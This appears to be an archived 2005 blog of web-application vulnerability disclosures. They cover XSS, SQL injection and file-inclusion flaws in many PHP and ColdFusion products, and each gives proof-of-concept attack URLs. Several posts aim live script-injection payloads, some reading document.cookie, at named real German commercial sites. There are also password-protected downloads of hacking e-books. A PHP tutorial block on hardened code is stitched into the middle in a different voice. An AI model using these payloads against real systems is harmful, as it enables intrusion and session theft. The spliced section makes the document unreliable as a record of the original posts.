    Date: 14 dec. 2005
    vendor:http://www.whmcs.com/
    affected version:2.1 and prior

    Product Description:

    WHMCompleteSolution has the features that all web hosts are looking for. Integrated directly with the WHM and cPanel server management software, your WHMCS System will provide you with automated account creation, suspension and termination as well as keeping track of all clients including their hosting accounts and domains and all due payment dates associated with these. It also allows you to send mailings to individual clients or selected clients in mass with mail merge features to customise the messages. Not only does it handle clients, but it also has an integrated support system including a ticket system which supports attachments, knowledgebase, announcements and downloads.


    Vuln. Description:

    WHMCompleteSolution contains a flaw that allows a remote cross-site scripting attack. This flaw exists because input passed to the search parameters in "knowledgebase.php" isn't properly sanitised before being returned to the user.
    This could allow a user to create a specially crafted URL that would execute arbitrary code in a user's browser within the trust relationship between the browser and the server, leading to a loss of integrity.

    Solution:
    Edit the source code to ensure that input is properly sanitised.

    CKGOLD XSS vuln.

    Vuln. discovered by : r0t
    Date: 14 dec. 2005
    vendor:http://www.cartkeeper.com/
    affected version:latest

    Product Description:
    CKGOLD - E-Commerce Shopping Cart Solution
    The CKGold system is a feature rich shopping cart developed for those wishing to host their own store with fine tuned controls for items, inventory, cart and checkout. Below is a list of some of the great features you will find in CKGold. Over the years we've listened to our clients' needs and have designed a rich set of innovative tools to build an effective e-commerce site. We continually plan for improvements and new features based on client feedback and suggestions.


    Vuln. Description:

    CKGOLD contains a flaw that allows a remote cross-site scripting attack. This flaw exists because input passed to the search parameters in "search.php" isn't properly sanitised before being returned to the user.
    This could allow a user to create a specially crafted URL that would execute arbitrary code in a user's browser within the trust relationship between the browser and the server, leading to a loss of integrity.

    Solution:
    Edit the source code to ensure that input is properly sanitised.

    QuickPayPro™ 3.1 Multiple vuln.


    Vuln. discovered by : r0t
    Date: 14 dec. 2005
    vendor:http://quickpaypro.com/
    affected version:3.1 and prior


    Product Description:

    QuickPayPro.com has been Online for over 3 years now, and the tools we provide you have been refined over the last 4 & 1/2 years! We're a member of the Better Business Bureau and the BBBOnline Reliability Program.
    We've spent over $400,000 in development and have successfully processed nearly $9,000,000 in live sales! It's been refined by over 5,000 users and manages over 90,000 Affiliates & 2.5 Million Subscribers. And the entire system is tested daily by Hacker Safe. Needless to say: This QuickPayPro is a well-oiled machine.



    1. SQL inj. vuln.

    QuickPayPro™ contains a flaw that allows remote SQL injection attacks. Input passed to the "popupid", "so", "sb", "nr", "subtrackingid", "delete", "trackingid" and "customerid" parameters isn't properly sanitised before being used in a SQL query. This can be exploited to manipulate SQL queries by injecting arbitrary SQL code.


    2. XSS attack vuln.

    QuickPayPro™ contains a flaw that allows a remote cross-site scripting attack. This flaw exists because input passed to multiple form field parameters, for example in "/communication/subscribers.tracking.add.php", "/support/tickets.add.php" and "/mycompany/categories.php", isn't properly sanitised before being returned to the user.
    This could allow a user to create a specially crafted URL that would execute arbitrary code in a user's browser within the trust relationship between the browser and the server, leading to a loss of integrity.

    examples:
    /communication/popups.edit.php?popupid=[SQL]

    /communication/customer.tickets.view.php?so=[SQL]

    /communication/customer.tickets.view.php?so=ASC&sb=[SQL]

    /communication/customer.tickets.view.php?so=ASC&sb=Status&nr=[SQL]

    /communication/subscribers.tracking.edit.php?subtrackingid=[SQL]

    /settings/design.php?delete=[SQL]

    /tools/tracking.details.php?trackingid=1[SQL]

    /mycompany/sales.view.php?customerid=1[SQL]


    Solution:
    Edit the source code to ensure that input is properly sanitised.

    MySQL Auction XSS vuln.


    Vuln. discovered by : r0t
    Date: 14 dec. 2005
    vendor:mysqlauction.com
    affected version: 3.0 and prior

    Product Description:

    Full featured, MySQL database driven online auction software. Features include item question and answer forum, featured listing options, listing fees, auto thumbnail creation. Also includes a MyAuction section, where members can keep track of items for sale, items they are bidding on, closed/sold items, and a personal watch item list. Member billing handled directly from the web based Admin Panel! A step-by-step installation script will set up the MySQL database tables using your database name, username and password. Use the Admin Panel to customize your auction variables and your new auction site is ready to go online! The software also uses header and footer HTML files, simply modify them to match your existing site for an integrated online auction solution. With this 100% MySQL database driven online auction software package, our goal is to develop powerful database applications, to improve web site server/client interface, and to provide dynamic content with improved performance.


    Vuln. Description:

    MySQL Auction contains a flaw that allows a remote cross-site scripting attack. This flaw exists because input passed to the search module's parameters isn't properly sanitised before being returned to the user.
    This could allow a user to create a specially crafted URL that would execute arbitrary code in a user's browser within the trust relationship between the browser and the server, leading to a loss of integrity.


    Solution:
    Edit the source code to ensure that input is properly sanitised.

    Jamit Job Board 2.4.x SQL inj.


    Vuln. discovered by : r0t
    Date: 14 dec. 2005
    vendor:http://www.jamit.com.au/
    affected version:2.4.1 and prior

    Product Description:

    Job Board Pro is a PHP application for running and managing a jobs portal website. It is written in PHP and supported by a MySQL database. It is a complete script for those that want to run a professional Job Board website, with all the features that you would expect, and is simple and easy to navigate and use. The Job Board script was designed by applying many of the principles learned from the study of Human-Computer Interaction (HCI). Features include Employer's area, Job Seeker's area, Email alerts, Job Search, Online resume, Multi-lingual, Dynamic Forms, Billing system for subscriptions & posting credits (integrated with PayPal IPN), and more.


    Vuln. Description:

    Job Board Pro contains a flaw that allows remote SQL injection attacks. Input passed to the "cat" parameter in "index.php" isn't properly sanitised before being used in a SQL query. This can be exploited to manipulate SQL queries by injecting arbitrary SQL code.

    example:
    /index.php?cat=[SQL]



    Solution:
    Edit the source code to ensure that input is properly sanitised.

    Ad Manager Pro SQL vuln.


    Vuln. discovered by : r0t
    Date: 14 dec. 2005
    vendor:www.phpwebscripts.com/admanagerpro/
    affected version:2.0 and prior

    Product Description:

    Quality ad management system. Graphical or text-based ads, detailed statistic with graphs, unlimited ad sizes/zones/ads, paid ads, many more.


    Vuln. Description:

    Ad Manager Pro contains a flaw that allows remote SQL injection attacks. Input passed to the "ad_number" parameter in "advertiser_statistic.php" isn't properly sanitised before being used in a SQL query. This can be exploited to manipulate SQL queries by injecting arbitrary SQL code.

    example:
    /advertiser_statistic.php?action=statistic_main&ad_number=[SQL]


    Solution:
    Edit the source code to ensure that input is properly sanitised.

    Tuesday, December 13, 2005

    Link Up Gold vuln.


    Vuln. discovered by : r0t
    Date: 13 dec. 2005
    vendor:http://www.phpwebscripts.com/linkupgold/
    affected version:2.5 and prior


    Product Description:

    A unique script for running your own linksite/search engine. Hundreds of advanced features: Unlimited number of categories in an unlimited number of levels, aliases@ for categories (cross-linked directories, the same feature that big search engines like Yahoo or Dmoz have), unlimited number of links and articles, fully featured paid links (advertisers can pay by using any payment company, also PayPal IPN supported), rating system, fully customizable pages by using templates (all public pages are editable in any HTML editor), multiple skins (15 styles bundled with the software), blacklist, multiple administrators with different rights, integrated poll, ability to count incoming and outgoing hits, user registration, mailing lists, reviews for links and articles, message board and many more. Links and articles may be sorted by title, popularity, incoming hits, date added etc. Pages are dynamic (php extension), also a plugin to create static html files or use Apache Rewrite is available.


    Vuln. Description:

    1. SQL
    Link Up Gold contains a flaw that allows remote SQL injection attacks. Input passed to the "number" parameter in "poll.php" isn't properly sanitised before being used in a SQL query. This can be exploited to manipulate SQL queries by injecting arbitrary SQL code.

    2. XSS
    Link Up Gold contains a flaw that allows a remote cross-site scripting attack. This flaw exists because input passed to the "link", "direction", "sort" and "phrase[]" parameters isn't properly sanitised before being returned to the user.
    This could allow a user to create a specially crafted URL that would execute arbitrary code in a user's browser within the trust relationship between the browser and the server, leading to a loss of integrity.


    examples:

    /poll.php?action=vote&number=[SQL]


    /tell_friend.php?link=%22%3E%3Cscript%3Ealert('r0t')%3C/script%3E

    /search.php?action=search_links_advanced&phrase%5B0%5D=%22%3E%3Cscript%3Ealert('r0t')%3C/script%3E

    /articles.php?n=122&page=1&sort=&direction=%22%3E%3Cscript%3Ealert('r0t')%3C/script%3E

    /articles.php?n=122&page=1&sort=%22%3E%3Cscript%3Ealert('r0t')%3C/script%3E

    Solution:
    Edit the source code to ensure that input is properly sanitised.

    VCD-db vuln.


    Vuln. discovered by : r0t
    Date: 13 dec. 2005
    vendor:http://vcddb.konni.com/
    affected version:V.0.98 and prior

    Product Description:
    VCD-db is a free web based software that lets you manage your DVD/VCD/CD collection on your own website. With VCD-db you can easily add new movies with 2 clicks; movie data is automatically fetched for you from IMDB and/or other sources. VCD-db is highly flexible and runs on multiple database platforms such as MySQL, MSSQL, IBM DB2, PostgreSQL and SQLite. VCD-db supports multiple users so your friends can also register on your VCD-db web and start their own catalog, which can then be compared to yours for convenience. VCD-db has a built in loan system so you can now easily keep track of all the CDs you lend to friends and family, and even send automatic emails to ask them to return your CDs. User catalogs can easily be exported and saved in numerous ways, such as Excel and XML, and can even be exported and then imported to another VCD-db site without any hassle.



    Vuln. Description:

    SQL.
    VCD-db contains a flaw that allows remote SQL injection attacks. Input passed to the "by" parameter in "search.php" isn't properly sanitised before being used in a SQL query. This can be exploited to manipulate SQL queries by injecting arbitrary SQL code.


    XSS.
    VCD-db contains a flaw that allows a remote cross-site scripting attack. This flaw exists because input passed to the "batch" parameter and to the Detail search module parameter isn't properly sanitised before being returned to the user.
    This could allow a user to create a specially crafted URL that would execute arbitrary code in a user's browser within the trust relationship between the browser and the server, leading to a loss of integrity.

    examples:
    /search.php?searchstring=&by=[SQL]

    /?page=category&category_id=1&viewmode=img&batch=%22%3E%3Cscript%3Ealert('r0t')%3C/script%3E


    Solution:
    Edit the source code to ensure that input is properly sanitised.

    mcGallery PRO vuln.


    Vuln. discovered by : r0t
    Date: 13 dec. 2005
    vendor:http://mcgallerypro.com/
    affected version: 2.2 and prior


    Product Description:

    A Pro version of mcGallery. Features: Displays photos, videos and Flash movies; Create thumbnails for photos; Multi-level restricted access; Unlimited number of albums; albums sorted in categories, News system ; Complete admin panel with stats, members administration, design settings; Users can post comments, send e-cards, choose interface language, build their own albums, and download their selection as zip file; Slideshow and user upload with moderation; Automated installation; 7 language files; Frontpage compliance; "register-globals off" compliance. WAP ability for admin, multiple admins, smilies in comments and ecards. Top Ten, upload by email, PNG support, WMV support,and plenty of new little settings. Last added: complete guestbook system.




    Vuln. Description:


    1. Local file include:
    Input passed to the "language" parameter in "index.php" isn't properly verified before it is used to include files. This can be exploited to include arbitrary files from local resources.

    2. SQL:
    mcGallery PRO contains a flaw that allows remote SQL injection attacks. Input passed to the "id", "start", "album" and "rand" parameters isn't properly sanitised before being used in a SQL query. This can be exploited to manipulate SQL queries by injecting arbitrary SQL code.


    3. XSS:
    mcGallery PRO contains a flaw that allows a remote cross-site scripting attack. This flaw exists because input passed to the search module's parameters isn't properly sanitised before being returned to the user.
    This could allow a user to create a specially crafted URL that would execute arbitrary code in a user's browser within the trust relationship between the browser and the server, leading to a loss of integrity.

    a few examples:

    /index.php?language=../FILE

    /show.php?start=0&id=[SQL]
    /show.php?start=[SQL]
    /index.php?album=[SQL]
    /show.php?rand=1&id=[SQL]
    /show.php?rand=[SQL]


    Solution:
    Edit the source code to ensure that input is properly sanitised.

    Mantis bugtracking system XSS vuln.


    Vuln. discovered by : r0t
    Date: 13 dec. 2005
    vendor:http://www.mantisbt.org/
    affected version: 1.0.0rc3,1.0.0rc2 and prior




    Product Description:

    Mantis is a web-based bugtracking system. It is written in the PHP scripting language and requires the MySQL database and a webserver. Mantis has been installed on Windows, Mac OS, OS/2, and a variety of Unix operating systems. Almost any web browser should be able to function as a client. It is released under the terms of the GNU General Public License (GPL).
    Mantis is free to use and modify. It is free to redistribute as long as you abide by the distribution terms of the GPL.



    Vuln. Description:

    Mantis contains a flaw that allows a remote cross-site scripting attack. This flaw exists because input passed to the "target_field" parameter in "view_filters_page.php" isn't properly sanitised before being returned to the user.
    This could allow a user to create a specially crafted URL that would execute arbitrary code in a user's browser within the trust relationship between the browser and the server, leading to a loss of integrity.



    example:
    /view_filters_page.php?for_screen=1&target_field=%22%3E%3Cscript%3Ealert('r0t')%3C/script%3E


    Solution:
    Edit the source code to ensure that input is properly sanitised.

    PhpWebGallery multiple SQL inj.


    Vuln. discovered by : r0t
    Date: 13 dec. 2005
    vendor:http://www.phpwebgallery.net/
    affected version: 1.5.1 and prior


    Product Description:

    PhpWebGallery is an image gallery with a simple installation interface and admin panel. Features: user management, groups, category privacy status, multi-server support (to store your pictures on another Web site), user comments, HTML templates, virtual categories, multilingual support, advanced search tool, rating, random pictures, EXIF and IPTC support...



    Vuln. Description:


    PhpWebGallery contains a flaw that allows remote SQL injection attacks. Input passed to the "since", "sort_by", "items_number", "search" and "image_id" parameters isn't properly sanitised before being used in a SQL query. This can be exploited to manipulate SQL queries by injecting arbitrary SQL code.



    examples:

    /comments.php?keyword=&author=&cat=0&since=[SQL]

    /comments.php?keyword=&author=&cat=0&since=1&sort_by=[SQL]

    /comments.php?keyword=&author=&cat=0&since=1&sort_by=date&sort_order=descending&items_number=[SQL]

    /category.php?cat=search&search=[SQL]

    /picture.php?cat=best_rated&image_id=[SQL]


    Solution:
    Edit the source code to ensure that input is properly sanitised.

    PHP JackKnife XSS vuln.


    Vuln. discovered by : r0t
    Date: 13 dec. 2005
    vendor:http://www.phpjk.com/
    affected version: 2.21 and prior

    Product Description:

    PHP JackKnife is an easily set-up, fast, feature-rich photo gallery script with MySQL or MSSQL databases. PHPJK supports template and user management, private galleries, automatic thumbnail creation, film strip, e-card feature for easy customization to match the rest of a site. PHPJK adds multiple uploads, updated securities, many new features including support for document types (ie tiff, psd, swf, doc, mp3, etc)! Additional features: auto-thumbnailing, image upload, rating, searching, unlimited categories and subcategories, unlimited galleries and images, private & locked galleries, bulk import via ftp, dynamic products display, alternate images, eCards, image referencing and much more! It also includes Aricaur.com integration so you can sell prints, t-shirts and gift items with your images on them! PHP & MSSQL/MySQL & Win/*nix



    Vuln. Description:

    PHP JackKnife contains a flaw that allows a remote cross-site scripting attack. This flaw exists because input passed to the "sKeywords" parameter in "DisplayResults.php" isn't properly sanitised before being returned to the user.
    This could allow a user to create a specially crafted URL that would execute arbitrary code in a user's browser within the trust relationship between the browser and the server, leading to a loss of integrity.

    example:

    /Search/DisplayResults.php?DOMAIN_Link=&iSearchID=292&sKeywords=%22%3E%3Cscript%3Ealert%28%27r0t%27%29%3C%2Fscript%3E



    Solution:
    Edit the source code to ensure that input is properly sanitised.

    EncapsGallery SQL inj. vuln.


    Vuln. discovered by : r0t
    Date: 13 dec. 2005
    vendor:http://powerdev.com.ru/products/encapsgallery/
    affected version:1.0.0 and prior

    Product Description:

    Photo gallery, supports different independent layouts/themes. Web design based on HTML templates. Supports http/ftp image upload, pgsql/mysql database, auto-thumbnails, config file, web admin.


    Vuln. Description:

    EncapsGallery contains a flaw that allows remote SQL injection attacks. Input passed to the "id" parameter isn't properly sanitised before being used in a SQL query. This can be exploited to manipulate SQL queries by injecting arbitrary SQL code.

    example:
    /gallery.php?page=foto&action=show_custom&id=[SQL]


    Solution:
    Edit the source code to ensure that input is properly sanitised.

    hack F.A.Q

    A good offline F.A.Q. for beginners.

    Download-Link:
    http://rapidshare.de/files/9083672/FAQ.rar.html


    pwd:pridels.blogspot.com

    Hacking Unix second edition

    Just another good e-book for you, in .pdf.


    Download-Link:
    http://rapidshare.de/files/9083446/h.rar.html


    pwd:pridels.blogspot.com

    Snipe Gallery SQL&XSS vuln.


    Vuln. discovered by : r0t
    Date: 13 dec. 2005
    vendor:http://www.snipegallery.com/
    affected version:3.1.4 and prior

    Product Description:

    Snipe Gallery is a searchable PHP/mySQL photo gallery manager. Features: Easy to install; Dynamic thumbnailing, but only in the admin, and only if the thumbnail doesn't already exist, to keep the server load down; Ability for admin to suppress images that should not appear in user view; Supports PNG, JPG, and GIF images (depending on your version of the GDlib); Error checking to prevent admin from being able to delete categories with images or subcategories within them; "Silent" keyword assignment in admin; RSS Newsfeed tie-in, IPTC metadata import; bulk image import via .zip file and/or local files, cropping/thumbnailing tool to allow cropping and custom thumbnailing on the fly, and Images are searchable by title, description, photographer, location, and keyword.




    Vuln. Description:

    1. SQL inj.
    Snipe Gallery contains a flaw that allows remote SQL injection attacks. Input passed to the "gallery_id" and "image_id" parameters isn't properly sanitised before being used in a SQL query. This can be exploited to manipulate SQL queries by injecting arbitrary SQL code.

    2. XSS attack
    Snipe Gallery contains a flaw that allows a remote cross-site scripting attack. This flaw exists because input passed to the "keyword" parameter in "search.php" isn't properly sanitised before being returned to the user.
    This could allow a user to create a specially crafted URL that would execute arbitrary code in a user's browser within the trust relationship between the browser and the server, leading to a loss of integrity.


    examples:

    SQL
    /view.php?gallery_id=[SQL]
    /image.php?page=1&gallery_id=1&image_id=[SQL]

    XSS
    /search.php?keyword=%22%3E%3Cscript%3Ealert%28%27r0t%27%29%3C%2Fscript%3E&search_cat=&search_type=and


    Solution:
    Edit the source code to ensure that input is properly sanitised.

    Plogger SQL&XSS vuln.

    Vuln. discovered by : r0t
    Date: 13 dec. 2005
    vendor:http://www.plogger.org/
    affected version:Beta 2 and prior


    Product Description:

    Plogger is the definitive open-source web photo gallery. Simple to integrate with your site, lightweight, and packed with useful features, Plogger leaves the other image galleries in the dust. Automatic thumbnail generation, cruft free URLs, RSS support, powerful password protected admin area, picture comments, mass downloading and integrated JavaScript slideshow are just a few of the features you'll find in this script. Plogger requires PHP4, MySQL 3.23+ and GD1.0+.



    Vuln. Description:

    1. SQL inj.
    Plogger contains a flaw that allows remote SQL injection attacks. Input passed to the "page" and "id" parameters isn't properly sanitised before being used in a SQL query. This can be exploited to manipulate SQL queries by injecting arbitrary SQL code.

    2. XSS attack
    Plogger contains a flaw that allows a remote cross site scripting attack. This flaw exists because input passed to the "level" and "searchterms" parameters isn't properly sanitised before being returned to the user.
    This could allow a user to create a specially crafted URL that would execute arbitrary code in a user's browser within the trust relationship between the browser and the server, leading to a loss of integrity.


    examples:

    SQL
    /index.php?sortdir=ASC&level=album&id=[SQL]
    /?page=[SQL]

    XSS
    /index.php?level=%22%3E%3Cscript%3Ealert('r0t')%3C/script%3E

    /index.php?level=search&searchterms=%22%3E%3Cscript%3Ealert('r0t')%3C/script%3E


    Solution:
    Edit the source code to ensure that input is properly sanitised.
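    To make the "Solution" line concrete for both the Snipe Gallery and the Plogger reports above, here is an added PHP illustration (not code from either project; the table, column names, query shapes and function names are assumed) of the two bug shapes: an integer id such as gallery_id, image_id, page or id reaching a query, and a free-text term such as keyword or searchterms being echoed back. Each vulnerable form is shown next to its hardened form.

```php
<?php
// Added illustration for the Snipe Gallery and Plogger reports above; not code
// from either project. Table and column names and the query shapes are assumed.

// ---- 1. SQL injection through an id parameter (gallery_id, image_id, page, id)

// Vulnerable shape: the raw query-string value is spliced into the statement,
// so /view.php?gallery_id=[SQL] rewrites the query.
function listImagesVulnerable(PDO $db, array $get): array
{
    $sql = 'SELECT image_id, title FROM images WHERE gallery_id = ' . $get['gallery_id'];
    return $db->query($sql)->fetchAll(PDO::FETCH_ASSOC);
}

// Hardened: enforce the parameter's type first, then bind it. Anything that is
// not a short decimal integer is refused before any SQL text exists.
function requireInt(array $get, string $name): int
{
    $raw = $get[$name] ?? null;
    if (!is_string($raw) || !preg_match('/^[0-9]{1,9}$/', $raw)) {
        throw new InvalidArgumentException("invalid value for '$name'");  // caller answers 400
    }
    return (int) $raw;
}

function listImagesSafe(PDO $db, array $get): array
{
    $stmt = $db->prepare('SELECT image_id, title FROM images WHERE gallery_id = :gid');
    $stmt->bindValue(':gid', requireInt($get, 'gallery_id'), PDO::PARAM_INT);  // bound, never interpolated
    $stmt->execute();
    return $stmt->fetchAll(PDO::FETCH_ASSOC);
}

// ---- 2. Reflected XSS through a search term (keyword, searchterms, level)

// Vulnerable shape: the term is echoed back unencoded, so a value beginning
// with "> closes the attribute and the rest is parsed as markup.
function renderSearchVulnerable(string $keyword): string
{
    return '<input type="text" name="keyword" value="' . $keyword . '">';
}

// Hardened: encode for the HTML attribute context at output time. ENT_QUOTES
// covers the double quote the reported payload relies on.
function renderSearchSafe(string $keyword): string
{
    $enc = htmlspecialchars($keyword, ENT_QUOTES, 'UTF-8');
    return '<input type="text" name="keyword" value="' . $enc . '">';
}

// The same term usually also becomes a LIKE operand, so it is bound as well and
// its LIKE wildcards are neutralised with an explicit ESCAPE character.
function searchImagesSafe(PDO $db, string $keyword): array
{
    $pattern = '%' . str_replace(['!', '%', '_'], ['!!', '!%', '!_'], $keyword) . '%';
    $stmt = $db->prepare("SELECT image_id, title FROM images WHERE title LIKE :kw ESCAPE '!' LIMIT 50");
    $stmt->bindValue(':kw', $pattern, PDO::PARAM_STR);
    $stmt->execute();
    return $stmt->fetchAll(PDO::FETCH_ASSOC);
}

// ---- Self-check against an in-memory SQLite database (needs ext/pdo_sqlite)
if (PHP_SAPI === 'cli') {
    $db = new PDO('sqlite::memory:', null, null, [PDO::ATTR_ERRMODE => PDO::ERRMODE_EXCEPTION]);
    $db->exec('CREATE TABLE images (image_id INTEGER, gallery_id INTEGER, title TEXT)');
    $db->exec("INSERT INTO images VALUES (1, 1, 'sunset'), (2, 1, 'sun_rise'), (3, 2, 'harbour')");

    var_dump(count(listImagesSafe($db, ['gallery_id' => '1'])));   // int(2)
    try {
        listImagesSafe($db, ['gallery_id' => '1abc']);              // not an integer
    } catch (InvalidArgumentException $e) {
        echo 'rejected: ', $e->getMessage(), "\n";                  // the type check fires
    }
    echo renderSearchSafe('"><script>alert(\'r0t\')</script>'), "\n";  // quotes and brackets encoded
    var_dump(count(searchImagesSafe($db, 'sun_')));                 // int(1): '_' is literal, not a wildcard
}
```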

    Wednesday, December 07, 2005

    www.bahnshop.de multiple vuln.

    https://www.bahnshop.de/cgi-bin/dbshop?HTML=[include]

    https://www.bahnshop.de/cgi-bin/dbshop?HTML=show/db_show.htm&VS_TAB_NAME=WEIHNACHTEN&VS_INDEX=''

    https://www.bahnshop.de/cgi-bin/dbshop?HTML=show/db_show.htm&VS_TAB_NAME=WEIHNACHTEN&VS_INDEX=%22%3E%3Cscript%3Ealert('r0t')%3C/script%3E

    https://www.bahnshop.de/cgi-bin/dbshop?HTML=%22%3E%3Cscript%3Ealert('r0t')%3C/script%3E

    https://www.bahnshop.de/cgi-bin/dbshop?HTML=show/db_show.htm&VS_TAB_NAME=WEIHNACHTEN&VS_INDEX=1130849516131&VS_PARENT_ID=%22%3E%3Cscript%3Ealert('r0t')%3C/script%3E

    t-online.de SHOP XSS

    What I know is that T-online is from Deutsche Telekom, the main ISP in Germany, and also a big company where good specialists work.

    Anyway, the "searchHandle" parameter isn't properly sanitised before being returned to the user.
    This could allow a user to create a specially crafted URL that would execute arbitrary code in a user's browser within the trust relationship between the browser and the server, leading to a loss of integrity.

    live example:

    http://www.t-online-shop.de/tonline/product.do?action=getProductDetail&product=7993&searchHandle=%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E

    eplus.de XSS

    http://www.eplus.de/frame.asp?go=%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E

    https://www.eplus.de/frame.asp?go=/handys/0/0_1/0_1_merkzettel.asp?ref=%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E

    https://www.eplus.de/frame.asp?go=https%3A//www.eplus.de/kundenservice/0/0/0_onlinehilfe_suche_ausgabe.asp%3FTyp%3DDokument%26SubTyp1%3DFAQ%26SubTyp2%3DDownload%26Eingabe1%3Dn223i%26Eingabe2%3D%26Eingabe3%3D%26Verknuepfung1%3DAND%26Verknuepfung2%3D%26Verknuepfung3%3D%26Sortierung%3D%2522%253E%253Cscript%253Ealert%28document.cookie%29%253C/script%253E%26AusgabeSeite%3D0%255Fonlinehilfe%255Fsuche%255Fausgabe%252Easp

    https://www.eplus.de/frame.asp?go=https%3A//www.eplus.de/kundenservice/0/0/0_onlinehilfe_faq_ausgabe.asp%3Frubrik%3D79%26main%3D79%26start%3D%2522%253E%253Cscript%253Ealert%28document.cookie%29%253C/script%253E

    https://www.eplus.de/frame.asp?go=https%3A//www.eplus.de/kundenservice/0/0/0_onlinehilfe_faq_ausgabe.asp%3Frubrik%3D70%26main%3D%2522%253E%253Cscript%253Ealert%28document.cookie%29%253C/script%253E

    https://www.eplus.de/frame.asp?go=https%3A//www.eplus.de/kundenservice/0/0/0_onlinehilfe_faq_ausgabe.asp%3Frubrik%3D%2522%253E%253Cscript%253Ealert%28document.cookie%29%253C/script%253E

    shop2.o2online.de XSS vuln.

    o2 is my favorite mobile phone operator, that's why I checked their website.

    Vuln. description:

    The o2 shop contains a flaw that allows a remote cross site scripting attack. This flaw exists because input passed to the "nidx" and "tariffType" parameters isn't properly sanitised before being returned to the user.
    This could allow a user to create a specially crafted URL that would execute arbitrary code in a user's browser within the trust relationship between the browser and the server, leading to a loss of integrity.

    live examples:


    http://shop2.o2online.de/o2/interessenten/necos/handys/siemens/index.html?nidx=%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E

    http://shop2.o2online.de/o2/interessenten/necos/handys/siemens/index.html?nidx=6&tariffType=%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E

    Tuesday, December 06, 2005

    Magic Forum Personal SQL&XSS vuln.

    Vuln. discovered by : r0t
    Date: 6 dec. 2005
    vendor:www.cfmagic.com/products/magicforumper.cfm
    affected version:2.5 and prior

    Product Description:

    Magic Forum Personal is our full-featured, yet value priced, discussion forum application. Designed for a small to medium sized site, it has all of the features required for a discussion forum without all of the fluff, not to mention high price, found in most forum apps. Primary forum features include: registration of members, use of moderators, optional approval of posts, moderators can approve, edit, delete any post, complete member profile area, members use post signatures, subscriptions to posts, PHTML (Pseudo HTML) based editor interface, full-featured search function, and much, much more. Also, a complete admin area with tons of options that allow you to tailor the app to your site's needs. Some of the options include: Use PHTML, Show Stats, Show Moderators, Track Views, Number of Topics/Replies Per Page, forum wide Date/Time Display, Allow Subscriptions, Allow Signatures, Use of Member Levels, Allow Save Login, Check Member Email and many, many more. We have a fully-functional online demo available and you can get more info at the Magic Forum Personal home page.


    1. SQL inj vuln.
    Magic Forum Personal contains a flaw that allows remote SQL injection attacks. Input passed to the "ForumID", "Thread" and "ThreadID" parameters isn't properly sanitised before being used in a SQL query. This can be exploited to manipulate SQL queries by injecting arbitrary SQL code.

    examples:
    /view_forum.cfm?ForumID=1[SQL]
    /view_thread.cfm?ForumID=1[SQL]
    /view_thread.cfm?ForumID=1&ThreadID=1&Thread=1[SQL]
    /view_thread.cfm?ForumID=1&ThreadID=1[SQL]


    2. XSS
    Magic Forum Personal contains a flaw that allows a remote cross site scripting attack. This flaw exists because input passed to search parameters in "search_forums.cfm" isn't properly sanitised before being returned to the user.
    This could allow a user to create a specially crafted URL that would execute arbitrary code in a user's browser within the trust relationship between the browser and the server, leading to a loss of integrity.


    Solution:
    Edit the source code to ensure that input is properly sanitised.

    Magic Book v2.0 Professional Vuln.

    Vuln. discovered by : r0t
    Date: 6 dec. 2005
    vendor:www.cfmagic.com/products/magicbook.cfm
    affected version:v.2.0 and prior

    Product Description:
    Magic Book Professional Edition is our totally loaded Guest Book application. It has all the things you might expect from any Guest Book available today. It allows visitors to add their comments as well as name and email address to the book in an automated process. These are then displayed in order of input for all your visitors to see. But that is where any similarity with others ends as we have added features not found on any other Guest Book anywhere.

    Vuln. Description:
    Magic Forum Personal contains a flaw that allows a remote cross site scripting attack. This flaw exists because input passed to the "StartRow" parameter isn't properly sanitised before being returned to the user.
    This could allow a user to create a specially crafted URL that would execute arbitrary code in a user's browser within the trust relationship between the browser and the server, leading to a loss of integrity.

    Also, through the error messages produced by the example below, an attacker can view sensitive information, directory traversal, etc.


    example:
    /book.cfm?StartRow=%22%3E%3Cscript%3Ealert('r0t')%3C/script%3E

    Solution:
    Edit the source code to ensure that input is properly sanitised.

    Magic List pro 2.5 SQL inj. vuln.

    Vuln. discovered by : r0t
    Date: 6 dec. 2005
    vendor:www.cfmagic.com/products/magiclistpro.cfm
    affected version:2.5

    Product Description:
    Magic List Pro is our full-featured opt-in mailing list application, and CFMagic's flagship product. It has all of the features required for medium to large sites that want to generate and maintain mailing lists as well as collect a demographic information database. Have thousands of customer email addresses to manage? Magic List Pro is the answer, now more than ever!


    Vuln. Description:
    Magic List Pro contains a flaw that allows remote SQL injection attacks. Input passed to the "ListID" parameter in "view_archive.cfm" isn't properly sanitised before being used in a SQL query. This can be exploited to manipulate SQL queries by injecting arbitrary SQL code.

    example:
    /view_archive.cfm?ListID=[SQL]

    Solution:
    Edit the source code to ensure that input is properly sanitised.

    CF_Nuke v4.6 Multiple vuln.

    Vuln. discovered by : r0t
    Date: 6 dec. 2005
    vendor:http://www.mycfnuke.com/
    affected version:v4.6 and prior

    Product Description:

    CF_Nuke is a free easy-to-setup & easy-to-use open source ColdFusion, community style web application. Offering greater control over web site maintenance, and increased performance over previous versions, CF_Nuke 4.6 is coming into its own as a stand-alone web portal similar to phpNuke.
    Core Features - Links, News and Reviews, Favorite Quotations - Private Message System for Members - Downloads - Themes - Recommend to Friend - Site FAQ System - Keyword and Category search - Member Registration - Users can submit News, Reviews, Quotations & Links for approval - extensive Admin capabilities. Additional Modules (Forums, Photo Gallery, Shoutbox, RSS, Calendar, Who's Online, Newsletters, etc.) are being made available by our Awesome members.




    Vuln. Description:


    1) Input passed to the "sector" and "page" parameters in "index.cfm" isn't properly sanitised before being used to include ".cfm" files. This can be exploited to include arbitrary ".cfm" files that are accessible on the server.

    Successful exploitation requires that "Sandbox Security" is not enabled for the directory.

    2) Input passed to the "cat", "topic", and "newsid" parameters isn't properly sanitised before being returned to the user. This can be exploited to execute arbitrary HTML and script code in a user's browser session in context of an affected site.

    Successful exploitation requires that "Global Script Protection" is disabled.




    examples:
    /index.cfm?sector=../local file

    /index.cfm?sector=quotes&page=../local file


    /index.cfm?sector=news&page=topic&topic=%22%3E%3Cscript%3Ealert('r0t')%3C/script%3E

    /index.cfm?sector=links&page=links&cmd=view&cat=%22%3E%3Cscript%3Ealert('r0t')%3C/script%3E

    /index.cfm?sector=news&page=read&newsid=%22%3E%3Cscript%3Ealert('r0t')%3C/script%3E

    Solution:
    Look for a more secure alternative. :)

